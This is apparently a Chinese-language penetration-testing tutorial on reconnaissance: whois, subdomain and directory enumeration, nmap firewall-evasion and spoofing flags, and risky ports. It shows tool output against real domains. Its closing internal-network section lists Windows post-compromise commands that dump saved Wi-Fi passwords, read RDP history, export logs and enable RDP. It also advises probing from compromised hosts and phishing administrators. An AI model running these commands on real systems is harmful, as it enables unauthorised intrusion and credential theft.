信息搜集 | O X O X

信息搜集概念

信息收集是指黑客为了更加有效地实施渗透攻击而在攻击前或攻击过程中对目标的所有探测活动

搜集什么信息

whois
网站架构
dns信息
子域名搜集
目录信息
旁站信息
C段信息
指纹信息
端口信息
备案信息
真实IP
探测WAF
社工
企业信息

信息搜集的目的

信息搜集的目的只有一个,通过搜集信息得知漏洞信息去利用

主动搜集和被动搜集

主动信息搜集是使用网站的直接访问,扫描网站,以及探测网站产生交互的被称之为主动搜集. 被动信息搜集是以通过你第三方来进行信息搜集

信息搜集的流程

whois

whois信息可以查询到注册域名的详细信息的数据库
whois通常使用tcp协议43端口.每个域名/ip的whois信息由对应的管理机构保存.
推荐站长之家api调用

1640497684134

dmitry(kali自带)


┌──(root💀B)-[~]
└─# dmitry -iwns dansemal.cn
Deepmagic Information Gathering Tool
"There be some deep magic going on"

HostIP:183.240.60.175
HostName:dansemal.cn

Gathered Inet-whois information for 183.240.60.175
---------------------------------


inetnum:        182.161.64.0 - 184.255.255.255
netname:        NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
descr:          IPv4 address block not managed by the RIPE NCC
remarks:        ------------------------------------------------------
remarks:
ration information,
remarks:        you can consult the following sources:
remarks:
remarks:        IANA
remarks:        http://www.iana.org/assignments/ipv4-address-space
remarks:        http://www.iana.org/assignments/iana-ipv4-special-registry
remarks:        http://www.iana.org/assignments/ipv4-recovered-address-space
remarks:
remarks:        AFRINIC (Africa)
remarks:        http://www.afrinic.net/ whois.afrinic.net
remarks:
remarks:        APNIC (Asia Pacific)
ic.net/ whois.apnic.net
remarks:
remarks:        ARIN (Northern America)
remarks:        http://www.arin.net/ whois.arin.net
remarks:
remarks:        LACNIC (Latin America and the Carribean)
remarks:        http://www.lacnic.net/ whois.lacnic.net
remarks:
remarks:        ------------------------------------------------------
country:        EU # Country is really world wide
admin-c:        IANA1-RIPE
tech-c:         IANA1-RIPE
status:         ALLOCATED UNSPECIFIED

created:        2021-12-21T16:03:56Z
last-modified:  2021-12-21T16:03:56Z
source:         RIPE
role:           Internet Assigned Numbers Authority
address:        see http://www.iana.org.
admin-c:        IANA1-RIPE
tech-c:         IANA1-RIPE
nic-hdl:        IANA1-RIPE
remarks:        For more information on IANA services
remarks:        go to IANA web site at http://www.iana.org.
mnt-by:         RIPE-NCC-MNT
created:        1970-01-01T00:00:00Z
last-modified:  2001-09-22T09:31:27Z
source:         RIPE # Filtered
% This query was served by the RIPE Database Query Service version 1.102.2 (HEREFORD)



Gathered Inic-whois information for dansemal.cn
---------------------------------
Domain Name: dansemal.cn
ROID: 20210322s10001s35063278-cn
Domain Status: clientTransferProhibited
Registrant: 该域名已采取WHOIS隐私保护服务
Sponsoring Registrar: 广州云讯信息科技有限公司
Name Server: brook.dnspod.net
Name Server: record.dnspod.net
Registration Time: 2021-03-22 15:32:05
Expiration Time: 2023-03-22 15:32:05
DNSSEC: signedDelegation

Gathered Netcraft information for dansemal.cn
---------------------------------

Retrieving Netcraft.com information for dansemal.cn
Netcraft.com Information gathered

Gathered Subdomain information for dansemal.cn
---------------------------------
Searching Google.com:80...
HostName:www.dansemal.cn
HostIP:183.240.60.174
HostName:cloud.dansemal.cn
HostIP:112.3.31.146
Searching Altavista.com:80...
Found 2 possible subdomain(s) for host dansemal.cn, Searched 0 pages containing 0 results

All scans completed, exiting

邮箱搜集

在信息搜集的过程中,邮箱信息可以解决我们很大的问题,我们可以fuzz邮箱的密码进行爆破后台.

theHarvester

┌──(root💀kali)-[~]
└─# theHarvester -d freebuf.com -b baidu                                                               2 ⨯

*******************************************************************
*  _   _                                            _             *
* | |_| |__   ___    /\  /\__ _ _ ____   _____  ___| |_ ___ _ __  *
* | __|  _ \ / _ \  / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
* | |_| | | |  __/ / __  / (_| | |   \ V /  __/\__ \ ||  __/ |    *
*  \__|_| |_|\___| \/ /_/ \__,_|_|    \_/ \___||___/\__\___|_|    *
*                                                                 *
* theHarvester 3.2.3                                              *
* Coded by Christian Martorella                                   *
* Edge-Security Research                                          *
* [email protected]                                   *
*                                                                 *
*******************************************************************


[*] Target: freebuf.com

[*] Searching Baidu.

[*] No IPs found.

[*] No emails found.

[*] Hosts found: 8
---------------------
bar.freebuf.com:60.205.171.29
company.freebuf.com:60.205.171.29
job.freebuf.com:60.205.171.29
live.freebuf.com:60.205.171.29
my.freebuf.com:60.205.171.29
search.freebuf.com:60.205.171.29
shop.freebuf.com:60.205.171.29
www.freebuf.com:60.205.171.29

┌──(root💀kali)-[~]
└─# theHarvester -d dansemal.github.io -b baidu

*******************************************************************
*  _   _                                            _             *
* | |_| |__   ___    /\  /\__ _ _ ____   _____  ___| |_ ___ _ __  *
* | __|  _ \ / _ \  / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
* | |_| | | |  __/ / __  / (_| | |   \ V /  __/\__ \ ||  __/ |    *
*  \__|_| |_|\___| \/ /_/ \__,_|_|    \_/ \___||___/\__\___|_|    *
*                                                                 *
* theHarvester 3.2.3                                              *
* Coded by Christian Martorella                                   *
* Edge-Security Research                                          *
* [email protected]                                   *
*                                                                 *
*******************************************************************


[*] Target: dansemal.github.io

[*] Searching Baidu.

[*] No IPs found.

[*] No emails found.

[*] No hosts found.

手机号

手机号在信息搜集的时候也略显重要,因为我们可以通过手机号去查到关于管理人员的更多信息,甚至可以通过反查微信钓鱼的方式来进行,或者其他的方式.

主动信息搜集

指通过一定的方式(系统自带命令或者其他工具)，直接与目标系统或者主机进行交互通信，以达到收集信息的目的。
主动信息收集的必要条件
使用受控的第3三方电脑进行探测
使用代理或者已经被控制的主机
做好被封杀的准备
使用噪声迷惑目标，掩藏真实的的探测流量扫描
发送不同的探测，根据返回结果判断目标状态
主动信息收集的发现过程
识别存活的目标系统或者主机(潜在的攻击目标)。
根据osi的分层，主要在2 (数据链路层) /3 (网络层) /4 (传输层)层进行主机发现。
输出发现结果。

收集所需信息

开放端口
开放服务
服务版本
用户名
域名
网站系统
历史信息
身份信息

代理隐蔽

在主动信息过程中，可能会存在-一定被IPS/IDS检测到，我们可以使用proxychains这款工具来
达到代理的效果
或在Windows中使用Proxifier。

主机发现

在二层网络中,使用arping发现主机

netdiscover

1 2	┌──(root💀B)-[~] └─# netdiscover -i eth0 -r 192.168.0.1/24

netdiscover -l 文件路径 (扫描文件ip)

netdiscover -p 被动扫描

fping

Fping程序类似于ping (ping是通过ICMP. (网络控制信息协议InternetControl Message
Protocol)协议回复请求以检测主机是否存在)。Fping 与ping不同的地方在于，fping可以在
命令行中指定要ping的主机数量范围，也可以指定含有要ping的主机列表文件。

hping3

Hping能够发送几乎任意的TCP/IP包;
功能强大但是每次只能扫描一个目标。
Hping3发送ICMP包:
hping3 192.168.181.130 --icmp -C 2

子域名搜集

https://phpinfo.me/domain/ ps.查看源代码其实是个自带字典本地子域名工具
altdns
oneforall
layer子域名挖掘机
subDomainBrute

安装常见问题默认 python pip 版本不对应
更换默认python版本为3 安装pip3
wydomain

sublist3r

af install sublist3r #kali下

┌──(root💀kali)-[~]
└─# sublist3r -d qq.com                                                                                                            130 ⨯

                 ____        _     _ _     _   _____
                / ___| _   _| |__ | (_)___| |_|___ / _ __
                \___ \| | | | '_ \| | / __| __| |_ \| '__|
                 ___) | |_| | |_) | | \__ \ |_ ___) | |
                |____/ \__,_|_.__/|_|_|___/\__|____/|_|

                # Coded By Ahmed Aboul-Ela - @aboul3la

[-] Enumerating subdomains now for qq.com
[-] Searching now in Baidu..
[-] Searching now in Yahoo..
[-] Searching now in Google..
[-] Searching now in Bing..
[-] Searching now in Ask..
[-] Searching now in Netcraft..
[-] Searching now in DNSdumpster..
[-] Searching now in Virustotal..
[-] Searching now in ThreatCrowd..
[-] Searching now in SSL Certificates..
[-] Searching now in PassiveDNS..
[-] Total Unique Subdomains Found: 2690
login.imqq.com
localhost.ptlogin2.imqq.com
ssl.ptlogin2.imqq.com
ssl.ui.ptlogin2.imqq.com
ssl.xui.ptlogin2.imqq.com
www.qq.com
0.qq.com
007.qq.c                                                            
021.qq.com
1.qq.com
10.qq.com
100.qq.com
file.100.qq.com
res.100.qq.com
1000.qq.com
101.qq.com
pick.101.qq.com
game.108.qq.com
110.qq.com
1108.qq.com
111.qq.com
1111.qq.com
124bjg0.qq.com
12530.qq.com
176.qq.com
17roco.qq.com
m.17roco.qq.com
m1.17roco.qq.com
mres.17roco.qq.com


┌──(root💀B)-[~]
└─# sublist3r -d dansemal.cn

                 ____        _     _ _     _   _____
                / ___| _   _| |__ | (_)___| |_|___ / _ __
                \___ \| | | | '_ \| | / __| __| |_ \| '__|
                 ___) | |_| | |_) | | \__ \ |_ ___) | |
                |____/ \__,_|_.__/|_|_|___/\__|____/|_|

                # Coded By Ahmed Aboul-Ela - @aboul3la

[-] Enumerating subdomains now for dansemal.cn
[-] Searching now in Baidu..
[-] Searching now in Yahoo..
[-] Searching now in Google..
[-] Searching now in Bing..
[-] Searching now in Ask..
[-] Searching now in Netcraft..
[-] Searching now in DNSdumpster..
[-] Searching now in Virustotal..
[-] Searching now in ThreatCrowd..
[-] Searching now in SSL Certificates..
[-] Searching now in PassiveDNS..
[!] Error: Virustotal probably now is blocking our requests
[-] Total Unique Subdomains Found: 12
www.dansemal.cn
blog.dansemal.cn
cdn.dansemal.cn
cloud.dansemal.cn
joe.dansemal.cn
mail.dansemal.cn
pl.dansemal.cn
qh.dansemal.cn
ur.dansemal.cn
vercel.dansemal.cn
vul.dansemal.cn
waline.dansemal.cn

网站架构

nikto(kali自带)

Options:
    -ask+               是否询问提交更新
                            yes   每次 (default)
                            no    不询问,不发送
                            auto  不询问,自动发送
    -Cgidirs+           扫描CGI目录: "none", "all", 或者 "/cgi/ /cgi-a/"
    -config+            使用此配置文件
    -Display+           打开/关闭显示输出:
                            1     显示重定向
                            2     显示 cookies received
                            3     显示所有 200/OK响应
                            4     显示需要身份验证的URL
                            D     调试输出
                            E     显示所有HTTP错误
                            P     打印进展到STDOUT
                            S     Scrub输出IPS和主机名
                            V     详细输出
    -dbcheck           检查数据库和其他密钥文件的语法错误
    -evasion+          编码技术:
                            1     随机URI编码（非UTF8）
                            2     目录自我引用 (/./)
                            3     Premature URL ending
                            4     预置长随机字符串
                            5     Fake parameter
                            6     TAB as request spacer
                            7     Change the case of the URL
                            8     Use Windows directory separator (\)
                            A     Use a carriage return (0x0d) as a request spacer
                            B     Use binary value 0x0b as a request spacer
     -Format+           Save file (-o) format:
                            csv   Comma-separated-value
                            json  JSON Format
                            htm   HTML Format
                            nbe   Nessus NBE format
                            sql   Generic SQL (see docs for schema)
                            txt   Plain text
                            xml   XML Format
                            (if not specified the format will be taken from the file extension passed to -output)
    -Help              Extended help information
    -host+             Target host/URL
    -404code           Ignore these HTTP codes as negative responses (always). Format is "302,301".
    -404string         Ignore this string in response body content as negative response (always). Can be a regular expression.
    -id+               Host authentication to use, format is id:pass or id:pass:realm
    -key+              Client certificate key file
    -list-plugins      List all available plugins, perform no testing
    -maxtime+          Maximum testing time per host (e.g., 1h, 60m, 3600s)
    -mutate+           Guess additional file names:
                            1     Test all files with all root directories
                            2     Guess for password file names
                            3     Enumerate user names via Apache (/~user type requests)
                            4     Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)
                            5     Attempt to brute force sub-domain names, assume that the host name is the parent domain
                            6     Attempt to guess directory names from the supplied dictionary file
    -mutate-options    Provide information for mutates
    -nointeractive     Disables interactive features
    -nolookup          Disables DNS lookups
    -nossl             Disables the use of SSL
    -no404             Disables nikto attempting to guess a 404 page
    -Option            Over-ride an option in nikto.conf, can be issued multiple times
    -output+           Write output to this file ('.' for auto-name)
    -Pause+            Pause between tests (seconds, integer or float)
    -Plugins+          List of plugins to run (default: ALL)
    -port+             Port to use (default 80)
    -RSAcert+          Client certificate file
    -root+             Prepend root value to all requests, format is /directory
    -Save              Save positive responses to this directory ('.' for auto-name)
    -ssl               Force ssl mode on port
    -Tuning+           Scan tuning:
                            1     Interesting File / Seen in logs
                            2     Misconfiguration / Default File
                            3     Information Disclosure
                            4     Injection (XSS/Script/HTML)
                            5     Remote File Retrieval - Inside Web Root
                            6     Denial of Service
                            7     Remote File Retrieval - Server Wide
                            8     Command Execution / Remote Shell
                            9     SQL Injection
                            0     File Upload
                            a     Authentication Bypass
                            b     Software Identification
                            c     Remote Source Inclusion
                            d     WebService
                            e     Administrative Console
                            x     Reverse Tuning Options (i.e., include all except specified)
    -timeout+          Timeout for requests (default 10 seconds)
    -Userdbs           Load only user databases, not the standard databases
                            all   Disable standard dbs and load only user dbs
                            tests Disable only db_tests and load udb_tests
    -useragent         Over-rides the default useragent
    -until             Run until the specified time or duration
    -update            Update databases and plugins from CIRT.net
    -url+              Target host/URL (alias of -host)
    -useproxy          Use the proxy defined in nikto.conf, or argument http://server:port
    -Version           Print plugin and database versions
    -vhost+            Virtual host (for Host header)
             + requires a value

wappalyzer(浏览器插件)

常见网站架构的类型

1.php+mysql+win/linux

1	1.2003 iis6.0/2008 iis7.0/2012 iis8.0

2. apache

3.nginx

2.aspx+access/mssql+win 3. 3.jsp+oracle/mysql/+win/linux

1.tomcat

4.php+postgresql+linux

目录信息

dirsearch

Usage: dirsearch.py [-u|--url] target [-e|--extensions] extensions [options]

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit

  Mandatory:
    -u URL, --url=URL   Target URL
    -l FILE, --url-list=FILE
                        Target URL list file
    --stdin             Target URL list from STDIN
    --cidr=CIDR         Target CIDR
    --raw=FILE          Load raw HTTP request from file (use `--scheme` flag
                        to set the scheme)
    -e EXTENSIONS, --extensions=EXTENSIONS
                        Extension list separated by commas (Example: php,asp)
    -X EXTENSIONS, --exclude-extensions=EXTENSIONS
                        Exclude extension list separated by commas (Example:
                        asp,jsp)
    -f, --force-extensions
                        Add extensions to every wordlist entry. By default
                        dirsearch only replaces the %EXT% keyword with
                        extensions

  Dictionary Settings:
    -w WORDLIST, --wordlists=WORDLIST
                        Customize wordlists (separated by commas)
    --prefixes=PREFIXES
                        Add custom prefixes to all wordlist entries (separated
                        by commas)
    --suffixes=SUFFIXES
                        Add custom suffixes to all wordlist entries, ignore
                        directories (separated by commas)
    --only-selected     Remove paths have different extensions from selected
                        ones via `-e` (keep entries don't have extensions)
    --remove-extensions
                        Remove extensions in all paths (Example: admin.php ->
                        admin)
    -U, --uppercase     Uppercase wordlist
    -L, --lowercase     Lowercase wordlist
    -C, --capital       Capital wordlist

  General Settings:
    -t THREADS, --threads=THREADS
                        Number of threads
    -r, --recursive     Brute-force recursively
    --deep-recursive    Perform recursive scan on every directory depth
                        (Example: api/users -> api/)
    --force-recursive   Do recursive brute-force for every found path, not
                        only paths end with slash
    -R DEPTH, --recursion-depth=DEPTH
                        Maximum recursion depth
    --recursion-status=CODES
                        Valid status codes to perform recursive scan, support
                        ranges (separated by commas)
    --subdirs=SUBDIRS   Scan sub-directories of the given URL[s] (separated by
                        commas)
    --exclude-subdirs=SUBDIRS
                        Exclude the following subdirectories during recursive
                        scan (separated by commas)
    -i CODES, --include-status=CODES
                        Include status codes, separated by commas, support
                        ranges (Example: 200,300-399)
    -x CODES, --exclude-status=CODES
                        Exclude status codes, separated by commas, support
                        ranges (Example: 301,500-599)
    --exclude-sizes=SIZES
                        Exclude responses by sizes, separated by commas
                        (Example: 123B,4KB)
    --exclude-texts=TEXTS
                        Exclude responses by texts, separated by commas
                        (Example: 'Not found', 'Error')
    --exclude-regexps=REGEXPS
                        Exclude responses by regexps, separated by commas
                        (Example: 'Not foun[a-z]{1}', '^Error$')
    --exclude-redirects=REGEXPS
                        Exclude responses by redirect regexps or texts,
                        separated by commas (Example: 'https://okta.com/*')
    --exclude-response=PATH
                        Exclude responses by response of this page (path as
                        input)
    --skip-on-status=CODES
                        Skip target whenever hit one of these status codes,
                        separated by commas, support ranges
    --minimal=LENGTH    Minimal response length
    --maximal=LENGTH    Maximal response length
    --max-time=SECONDS  Maximal runtime for the scan
    -q, --quiet-mode    Quiet mode
    --full-url          Full URLs in the output (enabled automatically in
                        quiet mode)
    --no-color          No colored output

  Request Settings:
    -m METHOD, --http-method=METHOD
                        HTTP method (default: GET)
    -d DATA, --data=DATA
                        HTTP request data
    -H HEADERS, --header=HEADERS
                        HTTP request header, support multiple flags (Example:
                        -H 'Referer: example.com')
    --header-list=FILE  File contains HTTP request headers
    -F, --follow-redirects
                        Follow HTTP redirects
    --random-agent      Choose a random User-Agent for each request
    --auth-type=TYPE    Authentication type (basic, digest, bearer, ntlm)
    --auth=CREDENTIAL   Authentication credential (user:password or bearer
                        token)
    --user-agent=USERAGENT
    --cookie=COOKIE

  Connection Settings:
    --timeout=TIMEOUT   Connection timeout
    -s DELAY, --delay=DELAY
                        Delay between requests
    --proxy=PROXY       Proxy URL, support HTTP and SOCKS proxies (Example:
                        localhost:8080, socks5://localhost:8088)
    --proxy-list=FILE   File contains proxy servers
    --replay-proxy=PROXY
                        Proxy to replay with found paths
    --scheme=SCHEME     Default scheme (for raw request or if there is no
                        scheme in the URL)
    --max-rate=RATE     Max requests per second
    --retries=RETRIES   Number of retries for failed requests
    -b, --request-by-hostname
                        By default dirsearch requests by IP for speed. This
                        will force dirsearch to request by hostname
    --ip=IP             Server IP address
    --exit-on-error     Exit whenever an error occurs

  Reports:
    -o FILE, --output=FILE
                        Output file
    --format=FORMAT     Report format (Available: simple, plain, json, xml,
                        md, csv, html)

 You can change the dirsearch default configurations (default extensions,
timeout, wordlist location, ...) by editing the "/etc/dirsearch/default.conf"
file. More information at https://github.com/maurosoria/dirsearch.

御剑后台扫描工具
dirbuster
pk
dirmap

端口扫描

nmap

nmap -all ip
-sT 使用tcp进行扫描
-sS 半开放扫描
-sU udp端口扫描
-sF 也是tcp的扫描一种,发送一个fin标志的数据包
-sV 版本检测
-O 可以模糊测试对方系统版本PING大于67则windows
-A 全面检测
-sV 探测目标系统服务版本
-T4 设置线程

nmap绕过防火墙扫描

nmap --script=firewalk --traceroute 目标
nmap -p80 --script http-waf-detect --script-args="http-waf-detect.detectBodyChanges"
碎片扫描namp -f  nmap -mtu 8
诱饵扫描nmap -D RND:10 
空闲扫描nmap -P0 -sl zombie
随机数据长度扫描 nmap --data-length 25
欺骗性扫描nmap --sT -PN --spoof-mac aa:bb:cc:dd:ee:ff
namp --badsum 主机
nmap -g80 -S url 主机
nmap -p80 --script http-methods --script-args http.useragent="Mozilla 5"

ipc共享

IPC$ (Internet Process Connection) 是共享命名管道”的资源，它是为了让进程间通信而开放
的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行
加密数据的交换，从而实现对远程计算机的访问。IPC $是NT2000的一项新功能，它有一个特点，即在同- -时间内，两个IP之间只允许建立一个连接。 NT2000在提供了ipc$ 功能的同时,
在初次安装系统时还打开了默认共享，即所有的逻辑共享(C $、D$ 、 …和系统目录
(C:\windows)共享。所有的这些初衷都是为了方便管理员的管理。但好的初衷并不一-定要
收效，一些别有用心者会利用IPC $,访问共享资源，导出用户列表，并使用- -些字典工为了配合IPC共享工作，Windows操作系统(不包括Windows 98系列)在安装完成后，目动设置共享的目录为: C盘、D盘、E盘、ADMIN目录(C:Windows)等，即为ADMIN$ 、C $、 D$ 、E$等，但要注意，这些共享是隐藏的，只有管理员能够对他们进行远程操作。

1	nmap --script=smb-enum-shares.nse -sT

┌──(root💀kali)-[~]
└─# nmap -v -A -p1-65535 127.0.0.1
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-10 13:58 CST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:58
Completed NSE at 13:58, 0.00s elapsed
Initiating NSE at 13:58
Completed NSE at 13:58, 0.00s elapsed
Initiating NSE at 13:58
Completed NSE at 13:58, 0.00s elapsed
Initiating SYN Stealth Scan at 13:58
Scanning localhost (127.0.0.1) [65535 ports]
Discovered open port 22/tcp on 127.0.0.1
Completed SYN Stealth Scan at 13:58, 0.37s elapsed (65535 total ports)
Initiating Service scan at 13:58
Scanning 1 service on localhost (127.0.0.1)
Completed Service scan at 13:58, 0.01s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against localhost (127.0.0.1)
Retrying OS detection (try #2) against localhost (127.0.0.1)
Retrying OS detection (try #3) against localhost (127.0.0.1)
Retrying OS detection (try #4) against localhost (127.0.0.1)
Retrying OS detection (try #5) against localhost (127.0.0.1)
NSE: Script scanning 127.0.0.1.
Initiating NSE at 13:58
Completed NSE at 13:58, 0.08s elapsed
Initiating NSE at 13:58
Completed NSE at 13:58, 0.00s elapsed
Initiating NSE at 13:58
Completed NSE at 13:58, 0.00s elapsed
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000018s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|   3072 95:24:8a:70:02:c1:7c:b9:63:1d:57:bd:c4:ba:59:84 (RSA)
|   256 ac:24:26:ce:c9:34:47:e7:62:38:13:d1:03:6d:c7:54 (ECDSA)
|_  256 79:e3:be:ae:1e:ee:87:ed:bd:3d:b3:23:e6:de:92:08 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=4/10%OT=22%CT=1%CU=43844%PV=N%DS=0%DC=L%G=Y%TM=60713E8
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=MFFD7ST11NWA%O2=MFFD7ST11NWA%O3=MFFD7NNT11NWA%O4=MFFD7ST11NWA%O5=MFF
OS:D7ST11NWA%O6=MFFD7ST11)WIN(W1=FFCB%W2=FFCB%W3=FFCB%W4=FFCB%W5=FFCB%W6=FF
OS:CB)ECN(R=Y%DF=Y%T=40%W=FFD7%O=MFFD7NNSNWA%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=
OS:A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=
OS:Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%
OS:T=40%CD=S)

Uptime guess: 22.103 days (since Fri Mar 19 11:30:10 2021)
Network Distance: 0 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 13:58
Completed NSE at 13:58, 0.00s elapsed
Initiating NSE at 13:58
Completed NSE at 13:58, 0.00s elapsed
Initiating NSE at 13:58
Completed NSE at 13:58, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.35 seconds
           Raw packets sent: 65645 (2.892MB) | Rcvd: 131283 (5.520MB)

御剑端口扫描

公开漏洞库利用

白阁文库

SCAPY 网络信息

使用SCAPY创立发送数据包
pkt=IP(src=“192.168.0.7” ,dst=“39.156.69.79”)/TCP()
●res=sr1(pkt) /接收res. summary() //查看
●sr() /接受全部.
●send() //只发送.
发送两层数据包
●srp()
●srp1()
●sendp()

发送tcp数据包

ip=IP()
tcp=TCP()
ip.dst="192.168.0.6"
ip.dport=445
tcp.flags='A'
sr1(ip)
sr1(IP(dst="www.baidu.com")/TCP(dport=[21,80,3389],flags='A'))

被动信息搜集

谷歌语法

谷歌语法数据库

旁站搜集

https://www.webscan.cc/

dig

dig可以查询到域名dns记录,对此可以查询到对应ip 参数+trance可以进行跟踪

┌──(root💀B)-[~]
└─# dig dansemal.cn

; <<>> DiG 9.17.21-1-Debian <<>> dansemal.cn
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 49678
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1024
;; QUESTION SECTION:
;dansemal.cn.                   IN      A

;; AUTHORITY SECTION:
dansemal.cn.            3600    IN      SOA     ns3.dnsv4.com. enterprise2dnsadmin.dnspod.com. 1639057957 3600 180 1209600 180

;; Query time: 76 msec
;; SERVER: 192.168.0.2#53(192.168.0.2) (UDP)
;; WHEN: Mon Jan 10 18:47:49 CST 2022
;; MSG SIZE  rcvd: 116

指纹信息

wappalyzer(浏览器插件)
云悉
御剑web指纹扫描工具
在线cms识别

信息泄露搜集

SVN信息泄露

文件泄露

git泄露

robots.txt泄露

┌──(root💀B)-[~]
└─# curl www.dansemal.cn/robots.txt
User-agent: *
Allow: /

Sitemap: https://www.dansemal.cn/sitemap.xml

危险端口搜集

web类(web漏洞/敏感目录)

第三方通用组件漏洞struts thinkphp jboss ganglia zabbix
80 web
80-89 web
8000-9090 web

数据库类(扫描弱口令)

1433 MSSQL
1521 Oracle
3306 MySQL
5432 PostgreSQL

特殊服务类(未授权/命令执行类/漏洞)

443 SSL心脏滴血
873 Rsync未授权
5984 CouchDB http://xxx:5984/_utils/
6379 redis未授权
7001,7002 WebLogic默认弱口令，反序列
9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞
11211 memcache未授权访问
27017,27018 Mongodb未授权访问
50000 SAP命令执行
50070,50030 hadoop默认端口未授权访问

常用端口类(扫描弱口令/端口爆破)

21 ftp
22 SSH
23 Telnet
2601,2604 zebra路由，默认密码zebra
3389 远程桌面

端口合计详情

21 ftp
22 SSH
23 Telnet
80 web
80-89 web
161 SNMP
389 LDAP
443 SSL心脏滴血以及一些web漏洞测试
445 SMB

512,513,514 Rexec
873 Rsync未授权
1025,111 NFS
1433 MSSQL
1521 Oracle:(iSqlPlus Port:5560,7778)
2082/2083 cpanel主机管理系统登陆（国外用较多）
2222 DA虚拟主机管理系统登陆（国外用较多）
2601,2604 zebra路由，默认密码zebra
3128 squid代理默认端口，如果没设置口令很可能就直接漫游内网了
3306 MySQL
3312/3311 kangle主机管理系统登陆
3389 远程桌面
4440 rundeck 参考WooYun: 借用新浪某服务成功漫游新浪内网
5432 PostgreSQL
5900 vnc
5984 CouchDB http://xxx:5984/_utils/
6082 varnish 参考WooYun: Varnish HTTP accelerator CLI 未授权访问易导致网站被直接篡改或者作为代理进入内网
6379 redis未授权
7001,7002 WebLogic默认弱口令，反序列
7778 Kloxo主机控制面板登录
8000-9090 都是一些常见的web端口，有些运维喜欢把管理后台开在这些非80的端口上
8080 tomcat/WDCP主机管理系统，默认弱口令
8080,8089,9090 JBOSS
8083 Vestacp主机管理系统（国外用较多）
8649 ganglia
8888 amh/LuManager 主机管理系统默认端口
9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞
10000 Virtualmin/Webmin 服务器虚拟主机管理系统
11211 memcache未授权访问
27017,27018 Mongodb未授权访问
28017 mongodb统计页面
50000 SAP命令执行
50070,50030 hadoop默认端口未授权访问

内网信息收集

内网信息收集的概念

内网是分布在一个区域性的网络，也称之为局域网，针对于内网不公开于互联网之上，内网分
为好几种类型，有服务器内网、办公区域内网等等，内网可以方便的传输，以及可以保证其数
据的安全，其资产不亚于暴露外网的资产多，内网信息收集也是非常重要的。

作为红队来讲，突破内网的前提下就是针对于内网的信息收集，内网的资产分布式很广-，不仅
是WEB，甚至开放了各种危险端口，在内网中机器不保证其开防火墙，所以我们可以任由横
穿,假设内网机器大量没有打补J的ms17010漏洞，我们就可以横穿其内网了。

再一方面，即使内网很安全，当我们收集到密码之后去撞库，测试一下密码是否被重复使用,
也可以实现攻破其他主机。

内网信息搜集隐蔽

在收集内网信息的前提下，我们需要针对管理员的登录时间进行查看

net user administrator //查看最后登录时间
wevtutil epl security C:\System_log.evtx //保存所有日志信息  

ipconfig /all   查询本机IP信息是否多网卡
net user    查看本机有几个账户
query user    查看在线的用户
tasklist /v    显示所有运行的进程
systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"  查询系统版本
systeminfo    查看补丁信息
net share    查看共享信息
netsh firewall show config	查看防火墙信息
net statistics workstation	查看开机时间
wmic product get name,version	查看安装软件
net session			查看会话
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f					开启远程RDP
net config workstation    查看是否存在域环境
wlan show profiles   查看连接过的WiFi


netsh
wlan
show profiles
show profiles name="" key=clear 显示密码

rdp连接记录
reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s


内网主机提权
systeminfo

复制信息到 https://i.hacking8.com/tiquan

内网主机探测及扫描

内网穿透-流量代理

● 流量代理出网是将目标机器的内网代理出本机，之后再进行扫描，- -般代理出网的代理大部分都是
socks5、socks4, 流量代理的工具有很多，个人感觉最好的还是Frp比较稳定。
● 内网流量转发


内网区域大小探测
●	我们可以通过arp /a来观察网段的总体情况
●	私有IP地址有10段、172段、 192段, 大小从大到小排序的
●	A类地址
10.0.0.0--10.255.255.255
●	B类地址
172.16.0.0--172.31.255.255
●	C类地址
192.168.0.0--192.168.255.255

内网主机存活检测
使用ping 或nmap
当流量代理出来 可以使用proxychains 去调用nmap进行对目标内网进行扫描

NTscan
进行内网爆破

内网弱口令
